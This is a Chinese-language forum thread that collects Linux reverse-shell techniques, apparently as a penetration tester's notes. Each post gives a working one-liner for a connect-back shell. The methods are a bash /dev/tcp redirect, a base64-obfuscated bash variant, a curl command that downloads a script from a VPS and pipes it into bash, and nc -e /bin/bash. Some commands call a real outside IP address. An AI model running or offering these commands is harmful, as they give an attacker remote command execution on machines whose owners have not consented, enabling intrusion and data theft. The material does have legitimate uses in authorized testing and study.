武汉茑萝吧 关注:8贴子:1,253
  • 5回复贴,共1

武汉茑萝:Linux下反弹shell

只看楼主收藏回复

在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。


1楼2022-07-27 10:31回复
    bash反弹
    1. 靶机上执行
    bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1

    收到shell


    2楼2022-07-27 10:32
    回复
      2. 在特殊情况可以使用base64编码执行bash反弹shell

      bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'


      3楼2022-07-27 10:32
      回复
        curl反弹
        1. vps开启一个web服务,端口80。并编写index.html文件,内容包含bash一句话即可
        python3 -m http.server 80vim index.htmlbash -i >& /dev/tcp/vps ip/port 0>&1


        4楼2022-07-27 10:32
        回复
          2. vps开启监听
          nc -lvnp 6666

          3. 靶机执行
          curl 39.100.88.162/index.html|bash
          成功接收反弹shell


          5楼2022-07-27 10:32
          回复
            nc反弹
            nc -e /bin/bash 39.100.88.162 8000
            #或者是/bin/sh都行
            -e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。


            6楼2022-07-27 10:32
            回复